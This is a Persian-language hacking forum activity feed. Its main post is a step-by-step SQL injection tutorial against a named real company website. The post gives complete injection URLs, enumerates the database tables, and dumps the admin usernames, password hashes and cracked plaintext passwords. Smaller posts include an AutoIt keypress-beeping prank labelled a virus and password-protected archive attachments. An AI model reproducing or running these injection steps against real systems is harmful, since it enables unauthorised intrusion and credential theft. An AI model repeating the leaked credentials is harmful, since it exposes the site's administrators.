    Rvlocker پاسخی برای Rvlocker در یک موضوع ارسال کرد در تارگت های تمرینی

    ••.•´¯`•.•• 🎀 به نام خدا 🎀 ••.•`¯´•.•• با سلام خدمت شما کاربران محترم تیم انجمن گاردایران تارگت ساده ی بعدی برای آموزش شما http://www.easunreyrolle.com/product.php?id=60 با گذاشتن ' آسیب پذیری نمایان خواهد شد http://www.easunreyrolle.com/product.php?id=60' با قرار دادن دستور order by 999999-- برای نمایش تعداد ستون های آسیب پذیر http://www.easunreyrolle.com/product.php?id=60 order by 99999-- به عدد 9 خواهید رسید که صفحه load خواهد شد http://www.easunreyrolle.com/product.php?id=60 order by 9-- با وارد کردن دستور Union select 1,2,3,4,5,6,7,8,9-- ستون ها نمایش داده خواهند شد در صورت نمایان نشدن - برای بایپس در پشت عدد قرار دهید http://www.easunreyrolle.com/product.php?id=-60%20union%20select%201,2,3,4,5,6,7,8,9-- سپس با دستور group_concat(table_name,0x3c62723e)+from+information_schema.tables+where+table_schema=database() در ستون آسیب پذیر database مشخص خواهد شد http://www.easunreyrolle.com/product.php?id=-60%20union%20select%201,2,3,group_concat(table_name,0x3c62723e),5,6,7,8,9+from+information_schema.tables+where+table_schema=database()-- به این صورت admin_sections adminlogin adminroles categorydocs categoryfeature categorymain enewsletters financial homecontent ircats irfiles irpages logs maxvalues newsletter orderdetail ordermain productdesc productdocs productfeature productmain secountries senews senewscatlinks senewscats sestaticpages tblproducts tbltemp userdetails database مهم را به hex تبدیل میکنیم اگر برنامه خاصی برای hex کردن نداری از این سایت کمک بگیر ----> کلیک کنید adminlogin ===> 0x61646d696e6c6f67696e خب hex شده رو به جای database قرار دهید و تبدیلات را به این صورت اعمال کنید table_schema ---> table_name information_schema.tables ---> information_schema.columns table_name ---> column_name http://www.easunreyrolle.com/product.php?id=-60%20union%20select%201,2,3,group_concat(column_name,0x3c62723e),5,6,7,8,9+from+information_schema.columns+where+table_name=0x61646d696e6c6f67696e-- table های مهم نمایان خواهند شد بدین شکل adm_id adm_name adm_password adm_fullname adm_email adm_phone adm_type adm_status adm_crt_by adm_crt_date adm_md_date adm_passupddate و سپس با وارد کردن دستور http://www.easunreyrolle.com/product.php?id=-60%20union%20select%201,2,3,group_concat(adm_name,0x3a,adm_password,0x3c62723e),5,6,7,8,9+from+adminlogin-- اطلاعات بیرون کشیده خواهند شد بدین شکل admin:a0f78676e8d2a024a649075a14b5b451b381a909e00d39fb1e3e5edff6c1b15fbb973606b58ad7778786003889e6e0f1b9b8078c9750c4fe3f49dd8bc544e51e rohit:9b9a3c5afd4590b20885a6f08f666d3233080aff2a5aaba84838047fabc3a9e0ea341d508a45b9b6a20a9bcd820da1c8b2f3c26e158b0113a72ebc7d199926a6 administrator:55635945fbc505218b9997621db44ddfca2db85cecf6b320590bdcb336e3566c64f10074863b1311f09ec5b855fa504b625a367f06075b3bc0ac6939a7e0e812 plop:78b662931bb5ff208c1e798a2a06b7dd Crack 78b662931bb5ff208c1e798a2a06b7dd:------>>>>>plopplop 9b9a3c5afd4590b20885a6f08f666d3233080aff2a5aaba84838047fabc3a9e0ea341d508a45b9b6a20a9bcd820da1c8b2f3c26e158b0113a72ebc7d199926a6:----------------->teamwork 55635945fbc505218b9997621db44ddfca2db85cecf6b320590bdcb336e3566c64f10074863b1311f09ec5b855fa504b625a367f06075b3bc0ac6939a7e0e812:---------->admin643 a0f78676e8d2a024a649075a14b5b451b381a909e00d39fb1e3e5edff6c1b15fbb973606b58ad7778786003889e6e0f1b9b8078c9750c4fe3f49dd8bc544e51e: سعی میکنم روزی یک آموزش واستون قرار بدم و در ضمن دوستان عزیز لطفا تارگت های آموزشی را دیفیس نکنید این تارگت ها فقط برای آموزش شماست پس تمرین کنید که در آینده بتونید پیشرفت کنید در این زمینه موفق باشید
  41. Rvlocker

    💥مسدود شدن اکانت💯

  42. Rvlocker

    Bot For Dota2

    Rvlocker پاسخی برای Rvlocker در یک موضوع ارسال کرد در C , C++

    ••.•´¯`•.•• 🎀 به نام خدا 🎀 ••.•`¯´•.•• با سلام خدمت شما کاربران محترم تیم انجمن گاردایران Welcome, winter. Your late dawns and chilled breath make me lazy, but I love you nonetheless خوش آمدی زمستان! اگرچه سپیده دم های تو و نفس های سرد زمستانی ات من را سست و تنبل می کند اما من هنوز عاشقت هستم. دوستان عزیز همونطور که میدونید فصل سرما نزدیک هستش و آمار بیماری رو به افزایش پس لطفا در منزل های خودتون بمونید و فاصله های اجتماعی و نکات بهداشتی را رعایت کنید یک هدیه کوچک دارم واستون امیدوارم خوشحالتون کنه Snow.rar موفق باشید
  43. KR0N0S شروع به دنبال کردن Aparat Like Bot کرد
  44. KR0N0S

    Aparat Like Bot

    KR0N0S پاسخی برای KR0N0S در یک موضوع ارسال کرد در Python

    دکمه گزارش دادن در بالای هر تاپیک وجود دارد، اگر فکر می کنید که قانونی نقض شده می توانید از آن استفاده کنید! لطفا از ارسال اسپم خودداری کنید!!
  45. Mr_Exploit
    @C0d3!Nj3ct!0n
  46. Rvlocker

    ویروس نویسی

    Rvlocker پاسخی برای Rvlocker در یک موضوع ارسال کرد در ویروس

    با سلام و حترام خدمت تیم محترم 𝓰𝓾𝓪𝓻𝓭𝓲𝓻𝓪𝓷 در این تاپیک ویروسی رو واستون نوشتم که خطری نداره و شما میتونید دوستاتونو باهاش سرکار بزارید ; -------------------------------------------------------------------------------- ; - script written by Rvlocker Virus Creator - ; - Version 1.10 - ; - - ; - - ; - Created by Rvlocker - ; - - ; - With thanks to guardiran.org - ; - - ; -------------------------------------------------------------------------------- #include <Misc.au3> $dll = DllOpen("user32.dll") While 1 For $i = 1 To 221 If _IsPressed(Hex($i,2),$dll) Then Beep(Random(100,1000,1),100) ExitLoop EndIf Next Sleep(100) WEnd DllClose($dll) خب در اینجا کتاب خانه ای قرار دادم برای استفاده از Bib در سیستم کاربر #include <Misc.au3> اگر نمیدونید user32.dll چیه ؟! در واقع User32.dll فایلی است که هنگام استفاده از سیستم، پیغام های هشدار و پنجره ها را کنترل می کند. برای همین آدرسشو درون متغییر قرار دادم $dll = DllOpen("user32.dll") درون یک حلقه یک حلقه ی دیگر قرار دادم مل همان حلقه های تو در تو که با زدن هر کلید از کاربر صدای Bib ویندوزی به صدا در بیاد While 1 For $i = 1 To 221 If _IsPressed(Hex($i,2),$dll) Then Beep(Random(100,1000,1),100) ExitLoop EndIf Next Sleep(100) WEnd و در آخر user32.dll را باید ببندید DllClose($dll) پسورد فایل --> guardiran.org DonSad.rar
  1. نمایش فعالیت های بیشتر